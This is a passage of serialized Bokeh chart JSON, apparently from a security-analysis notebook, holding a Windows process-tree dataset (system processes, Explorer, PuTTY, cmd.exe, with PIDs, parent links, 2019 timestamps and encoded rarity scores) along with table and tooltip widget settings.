0xcb0\",\"PID: 0x77d8\",\"PID: 0x6e04\",\"PID: 0x7ea8\",\"PID: 0x7084\",\"PID: 0x34a0\",\"PID: 0x752c\",\"PID: 0x7990\",\"PID: 0x6d30\",\"PID: 0x3820\",\"PID: 0x5f84\",\"PID: 0x61d0\",\"PID: 0x4878\",\"PID: 0x51fc\",\"PID: 0x18c4\",\"PID: 0x1758\",\"PID: 0x1784\",\"PID: 0x1470\",\"PID: 0xe8c\"],\"__proc_name$$\":[\"smss.exe\",\"smss.exe\",\"csrss.exe\",\"winlogon.exe\",\"fontdrvhost.exe\",\"dwm.exe\",\"LogonUI.exe\",\"LogonUI.exe\",\"dwm.exe\",\"WerFault.exe\",\"userinit.exe\",\"explorer.exe\",\"iexplore.exe\",\"iexplore.exe\",\"msiexec.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"cmd.exe\",\"conhost.exe\",\"Taskmgr.exe\",\"CompMgmtLauncher.exe\",\"ServerManager.exe\",\"mmc.exe\",\"mmc.exe\"],\"accountNum\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAADShQAAAAAAANKFAAAAAAAA0oUAAAAAAADShQAAAAAAANKFAAAAAAAA0oUAAAAAAADShQAAAAAAANKFAAAAAAAA0oUAAAAAAADShQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineLen\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAABIQAAAAAAAgG5AAAAAAAAAKEAAAAAAAAAxQAAAAAAAACJAAAAAAAAAT0AAAAAAAABPQAAAAAAAACJAAAAAAACASUAAAAAAAABAQAAAAAAAADdAAAAAAAAASUAAAAAAAEBXQAAAAAAAAFlAAAAAAACAQUAAAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAABCQAAAAAAAgFFAAAAAAAAAQkAAAAAAAMBQQAAAAAAAAD5AAAAAAACAS0AAAAAAAABCQAAAAAAAgEVAAAAAAAAAREAAAAAAAMBQQAAAAAAAwFBA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineLogLen\":{\"__ndarray__\":\"AAAAAAAA+H9+bzM2Xeb6P3dsV9ZfGQNAf7LjjVNE8T+XfUs166/zP/3VT5Ynie4/ZkaA6KKt/D9mRoDooq38P/3VT5Ynie4/FnPfGjVS+z9/WMckGBX4P3/5myCjyfU/gCHYK/su+z9lXez5537/PwAAAAAAAABAoIeUsYC0+D8BQ7BX9l3mPwFDsFf2XeY/AUOwV/Zd5j/+p3dzneb4PyBmvIWFhf0//qd3c53m+D8uZVo2mjf9P3/1k+VJovc/7+YojIbY+z/+p3dzneb4P/UwvNGvIvo//7xPqAmi+T8uZVo2mjf9Py5lWjaaN/0/\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineScore\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAGauQAAAAAAAa9ZAAAAAAAB0k0AAAAAAANSZQAAAAAAA4IdAAAAAAABYs0AAAAAAACezQAAAAAAA4IdAAAAAAAA4sEAAAAAAANKoQAAAAAAAAqFAAAAAAAByskAAAAAAAH28QAAAAACAa8FAAAAAAAC4qEAAAAAAADCCQAAAAAAAMIJAAAAAAAAwgkAAAAAAAGypQAAAAAAAwrhAAAAAAABsqUAAAAAAAJC3QAAAAAAAHKVAAAAAAADls0AAAAAAAGypQAAAAAAAYK9AAAAAAAAYrUAAAAAAAPi3QAAAAAAA6bdA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineTokensFull\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAAcQAAAAAAAADVAAAAAAAAA8D8AAAAAAAAIQAAAAAAAAAhAAAAAAAAAKEAAAAAAAAAoQAAAAAAAAAhAAAAAAAAAKkAAAAAAAAAUQAAAAAAAABBAAAAAAAAAJEAAAAAAAAAzQAAAAAAAADdAAAAAAAAAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiQAAAAAAAAChAAAAAAAAAIkAAAAAAAAAoQAAAAAAAACBAAAAAAAAAJEAAAAAAAAAiQAAAAAAAACBAAAAAAAAAIEAAAAAAAAAxQAAAAAAAADFA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineTokensHash\":{\"__ndarray__\":\"AAAAAAAA+H8AAAA+Fv7EQQAAQOAkUeRBAAAAhMSprUEAAABUA++6QQAAAFQD77pBAAAAzf874UEAAADN/zvhQQAAAFQD77pBAACAWLuR3kEAAAAYe7GIQQAAAJoPrLFBAACAFB3U0kEAAIByCKLVQQAAQF+Ym9dBAABABnr720EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDwMmreQQAAwPCuBNVBAADA8DJq3kEAAMDwrgTVQQAAAMBFxt5BAAAAsPnQpUEAAMDwMmreQQAAAMBFxt5BAAAAwEXG3kEAAMD9uo7jQQAAwP26juNB\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"index\":[30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"isSystemSession\":[\"NaN\",true,true,true,true,true,true,true,true,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\csrss.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\fontdrvhost.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\logonui.exe\",\"c:\\\\windows\\\\system32\\\\logonui.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\werfault.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\program files (x86)\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\windows\\\\system32\\\\msiexec.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe\",\"c:\\\\windows\\\\system32\\\\notepad.exe\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe\",\"c:\\\\windows\\\\system32\\\\notepad.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe\",\"c:\\\\windows\\\\system32\\\\servermanager.exe\",\"c:\\\\windows\\\\system32\\\\mmc.exe\",\"c:\\\\windows\\\\system32\\\\mmc.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\"],\"parent_index\":[\"NaN\",\"22983\",\"9151\",\"9151\",\"9153\",\"9153\",\"9153\",\"9153\",\"9153\",\"9155\",\"9153\",\"9166\",\"9168\",\"12044\",\"12044\",\"9168\",\"12074\",\"12074\",\"12593\",\"9168\",\"9168\",\"9168\",\"9168\",\"9168\",\"14555\",\"9168\",\"9168\",\"9183\",\"9168\",\"9168\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\smss.exe|0x12c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\smss.exe|0x1384|2019-02-12 20:19:42.833000\",\"c:\\\\windows\\\\system32\\\\smss.exe|0x1384|2019-02-12 20:19:42.833000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\dwm.exe|0xc58|2019-02-12 20:19:43.440000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\userinit.exe|0x89c|2019-02-12 20:19:47.043000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe|0x77d8|2019-02-12 21:52:40.190000\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe|0x77d8|2019-02-12 21:52:40.190000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x7084|2019-02-12 21:53:59.190000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x7084|2019-02-12 21:53:59.190000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x752c|2019-02-12 22:22:39.490000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x4878|2019-02-12 22:53:48.680000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe|0x1758|2019-02-12 20:20:37.703000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\"],\"path\":[\"22983\",\"22983/9151\",\"22983/9151/9152\",\"22983/9151/9153\",\"22983/9151/9153/12048\",\"22983/9151/9153/12589\",\"22983/9151/9153/16076\",\"22983/9151/9153/9154\",\"22983/9151/9153/9155\",\"22983/9151/9153/9155/12588\",\"22983/9151/9153/9166\",\"22983/9151/9153/9166/9168\",\"22983/9151/9153/9166/9168/12044\",\"22983/9151/9153/9166/9168/12044/12045\",\"22983/9151/9153/9166/9168/12044/12062\",\"22983/9151/9153/9166/9168/12074\",\"22983/9151/9153/9166/9168/12074/12087\",\"22983/9151/9153/9166/9168/12074/12593\",\"22983/9151/9153/9166/9168/12074/12593/14553\",\"22983/9151/9153/9166/9168/12594\",\"22983/9151/9153/9166/9168/12712\",\"22983/9151/9153/9166/9168/14534\",\"22983/9151/9153/9166/9168/14541\",\"22983/9151/9153/9166/9168/14555\",\"22983/9151/9153/9166/9168/14555/14556\",\"22983/9151/9153/9166/9168/14575\",\"22983/9151/9153/9166/9168/9183\",\"22983/9151/9153/9166/9168/9183/9184\",\"22983/9151/9153/9166/9168/9195\",\"22983/9151/9153/9166/9168/9267\"],\"pathHash\":{\"__ndarray__\":\"AAAAAAAA+H8AAIBgNL7PQQAAAMRaEJxBAACA6N9D0EEAAAA3TnS8QQAAAGROBOhBAAAARH5c70EAAABEflzvQQAAAGROBOhBAAAAzx4zyEEAAIDhJ07qQQAA4BxeS+VBAADAaBhI5kEAAADsKBHLQQAAwH0nmdRBAACA2UpBxEEAAIDZSkHEQQAAgNlKQcRBAACA2UpBxEEAAACbZ+nFQQAA4Pq9OOZBAAAAm2fpxUEAAOD6vTjmQQAAQMQBW+VBAADA9qn02UEAAACbZ+nFQQAAAIYmwNVBAACADDTs00EAAMBb6jHSQQAAwFvqMdJB\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"pathLogScore\":{\"__ndarray__\":\"AAAAAAAA+H/3ZEArsHgLQE5HWjQcmgtArfKuuW35C0BJ9j0P5lQMQFBjURtwTgtAFUMXynK8C0AVQxfKcrwLQFBjURtwTgtAPlORFz3mC0DM/wSJIPsLQKENMwTA5gpAsuM0XJJRDUB7ivwcPpENQIOAyOmx1AtAaeelXOvjC0Bp56Vc6+MLQGnnpVzr4wtAaeelXOvjC0DR9ObVeM4LQAIyEAPP0wtA0fTm1XjOC0ACMhADz9MLQFUKcgSLRwtA5eDLP2jZC0DR9ObVeM4LQNtdOwbYtgxAxyk4LFRxDEChBVMAp0oLQKEFUwCnSgtA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"pathScore\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAADilQAAAAAAACKZAAAAAAACGqEAAAAAAAC6rQAAAAAAAPKRAAAAAAADmpkAAAAAAAOamQAAAAAAAPKRAAAAAAAAAqEAAAAAAAJKoQAAAAAAAAqJAAAAAAAAOskAAAAAAAGWzQAAAAAAAiKdAAAAAAADwp0AAAAAAAPCnQAAAAAAA8KdAAAAAAADwp0AAAAAAAF6nQAAAAAAAgqdAAAAAAABep0AAAAAAAIKnQAAAAAAAFKRAAAAAAACop0AAAAAAAF6nQAAAAAAAWK5AAAAAAAAQrEAAAAAAACakQAAAAAAAJqRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"proc_key\":[\"c:\\\\windows\\\\system32\\\\smss.exe|0x12c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\smss.exe|0x1384|2019-02-12 20:19:42.833000\",\"c:\\\\windows\\\\system32\\\\csrss.exe|0x1354|2019-02-12 20:19:42.860000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe|0x12ec|2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\fontdrvhost.exe|0x7c6c|2019-02-12 21:52:56.843000\",\"c:\\\\windows\\\\system32\\\\dwm.exe|0x2cac|2019-02-12 22:22:21.240000\",\"c:\\\\windows\\\\system32\\\\logonui.exe|0x3470|2019-02-14 04:12:29.037000\",\"c:\\\\windows\\\\system32\\\\logonui.exe|0xc7c|2019-02-12 20:19:43.437000\",\"c:\\\\windows\\\\system32\\\\dwm.exe|0xc58|2019-02-12 20:19:43.440000\",\"c:\\\\windows\\\\system32\\\\werfault.exe|0x75c4|2019-02-12 22:22:21.040000\",\"c:\\\\windows\\\\system32\\\\userinit.exe|0x89c|2019-02-12 20:19:47.043000\",\"c:\\\\windows\\\\explorer.exe|0xcb0|2019-02-12 20:19:47.130000\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe|0x77d8|2019-02-12 21:52:40.190000\",\"c:\\\\program files (x86)\\\\internet explorer\\\\iexplore.exe|0x6e04|2019-02-12 21:52:40.430000\",\"c:\\\\windows\\\\system32\\\\msiexec.exe|0x7ea8|2019-02-12 21:53:35.933000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x7084|2019-02-12 21:53:59.190000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x34a0|2019-02-12 21:55:36.450000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x752c|2019-02-12 22:22:39.490000\",\"c:\\\\program files\\\\putty\\\\putty.exe|0x7990|2019-02-12 22:41:29.717000\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe|0x6d30|2019-02-12 22:22:53.223000\",\"c:\\\\windows\\\\system32\\\\notepad.exe|0x3820|2019-02-12 22:31:24.453000\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe|0x5f84|2019-02-12 22:38:05.640000\",\"c:\\\\windows\\\\system32\\\\notepad.exe|0x61d0|2019-02-12 22:38:31.597000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x4878|2019-02-12 22:53:48.680000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x51fc|2019-02-12 22:53:48.697000\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe|0x18c4|2019-02-13 00:53:54.927000\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe|0x1758|2019-02-12 20:20:37.703000\",\"c:\\\\windows\\\\system32\\\\servermanager.exe|0x1784|2019-02-12 20:20:38.060000\",\"c:\\\\windows\\\\system32\\\\mmc.exe|0x1470|2019-02-12 20:21:23.163000\",\"c:\\\\windows\\\\system32\\\\mmc.exe|0xe8c|2019-02-12 20:31:25.767000\"],\"processName\":[\"NaN\",\"smss.exe\",\"csrss.exe\",\"winlogon.exe\",\"fontdrvhost.exe\",\"dwm.exe\",\"LogonUI.exe\",\"LogonUI.exe\",\"dwm.exe\",\"WerFault.exe\",\"userinit.exe\",\"explorer.exe\",\"iexplore.exe\",\"iexplore.exe\",\"msiexec.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"cmd.exe\",\"conhost.exe\",\"Taskmgr.exe\",\"CompMgmtLauncher.exe\",\"ServerManager.exe\",\"mmc.exe\",\"mmc.exe\"],\"source_index\":[\"22983\",\"9151\",\"9152\",\"9153\",\"12048\",\"12589\",\"16076\",\"9154\",\"9155\",\"12588\",\"9166\",\"9168\",\"12044\",\"12045\",\"12062\",\"12074\",\"12087\",\"12593\",\"14553\",\"12594\",\"12712\",\"14534\",\"14541\",\"14555\",\"14556\",\"14575\",\"9183\",\"9184\",\"9195\",\"9267\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAABAF9RAAAAAAEAX1EAAAAAAQBnUQAAAAABAGdRAAAAAAEAZ1EAAAAAAQBnUQAAAAABAGdRAAAAAAAAc1EAAAAAAQBnUQAAAAAAACdRAAAAAAIAJ1EAAAAAAwGHWQAAAAADAYdZAAAAAAIAJ1EAAAAAAQGHWQAAAAABAYdZAAAAAAIBc1kAAAAAAgAnUQAAAAACACdRAAAAAAIAJ1EAAAAAAgAnUQAAAAACACdRAAAAAAEDd00AAAAAAgAnUQAAAAACACdRAAAAAAMBt1kAAAAAAgAnUQAAAAACACdRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"timestamp_orig_par\":[\"NaN\",0.0,1550002782833.0,1550002782833.0,1550002782880.0,1550002782880.0,1550002782880.0,1550002782880.0,1550002782880.0,1550002783440.0,1550002782880.0,1550002787043.0,1550002787129.9998,1550008360190.0002,1550008360190.0002,1550002787129.9998,1550008439190.0002,1550008439190.0002,1550010159489.9998,1550002787129.9998,1550002787129.9998,1550002787129.9998,1550002787129.9998,1550002787129.9998,1550012028680.0,1550002787129.9998,1550002787129.9998,1550002837703.0,1550002787129.9998,1550002787129.9998]},\"selected\":{\"id\":\"1749\"},\"selection_policy\":{\"id\":\"1748\"}},\"id\":\"1595\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1747\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1743\",\"type\":\"StringEditor\"},{\"attributes\":{\"source\":{\"id\":\"1595\"}},\"id\":\"1650\",\"type\":\"CDSView\"},{\"attributes\":{\"editor\":{\"id\":\"1733\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1732\"},\"title\":\"SubjectLogonId\"},\"id\":\"1712\",\"type\":\"TableColumn\"},{\"attributes\":{\"end\":31,\"start\":-1},\"id\":\"1666\",\"type\":\"Range1d\"},{\"attributes\":{\"dimension\":\"height\"},\"id\":\"1620\",\"type\":\"WheelPanTool\"},{\"attributes\":{},\"id\":\"1734\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1601\"},\"value\":0.1},\"id\":\"1643\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1643\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1644\"}}},\"id\":\"1648\",\"type\":\"Text\"},{\"attributes\":{\"columns\":[{\"id\":\"1708\"},{\"id\":\"1710\"},{\"id\":\"1711\"},{\"id\":\"1712\"},{\"id\":\"1713\"},{\"id\":\"1714\"},{\"id\":\"1715\"},{\"id\":\"1716\"},{\"id\":\"1717\"},{\"id\":\"1718\"},{\"id\":\"1719\"}],\"height\":150,\"source\":{\"id\":\"1595\"},\"view\":{\"id\":\"1722\"},\"width\":950},\"id\":\"1720\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1733\",\"type\":\"StringEditor\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1635\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1636\"}}},\"id\":\"1640\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1727\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1617\",\"type\":\"ResetTool\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7,8]},\"id\":\"1659\",\"type\":\"FixedTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1596\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1628\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1632\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1740\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1601\"},\"value\":2.2},\"id\":\"1651\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1633\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@NewProcessId\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TgtLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"1626\",\"type\":\"HoverTool\"},{\"attributes\":{\"editor\":{\"id\":\"1735\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1734\"},\"title\":\"NewProcessId\"},\"id\":\"1713\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1729\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1739\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1749\",\"type\":\"Selection\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"1751\"},\"group\":null,\"major_label_policy\":{\"id\":\"1752\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1614\"},\"visible\":false},\"id\":\"1613\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1745\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1744\"},\"title\":\"TargetLogonId\"},\"id\":\"1718\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1748\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1596\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1628\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1631\",\"type\":\"Rect\"},{\"attributes\":{\"callback\":null},\"id\":\"1619\",\"type\":\"TapTool\"},{\"attributes\":{\"active_scroll\":{\"id\":\"1620\"},\"tools\":[{\"id\":\"1617\"},{\"id\":\"1618\"},{\"id\":\"1619\"},{\"id\":\"1620\"},{\"id\":\"1626\"}]},\"id\":\"1621\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1738\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1737\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1736\"},\"title\":\"NewProcessName\"},\"id\":\"1714\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1743\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1742\"},\"title\":\"ParentProcessName\"},\"id\":\"1717\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1735\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1737\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1605\",\"type\":\"LinearScale\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1595\"},\"glyph\":{\"id\":\"1654\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1656\"},\"nonselection_glyph\":{\"id\":\"1655\"},\"view\":{\"id\":\"1658\"}},\"id\":\"1657\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":11,\"start\":1},\"id\":\"1601\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1728\",\"type\":\"StringFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"1609\"},\"coordinates\":null,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"group\":null,\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1661\"}},\"id\":\"1612\",\"type\":\"Grid\"},{\"attributes\":{\"coordinates\":null,\"group\":null},\"id\":\"1725\",\"type\":\"Title\"},{\"attributes\":{\"editor\":{\"id\":\"1739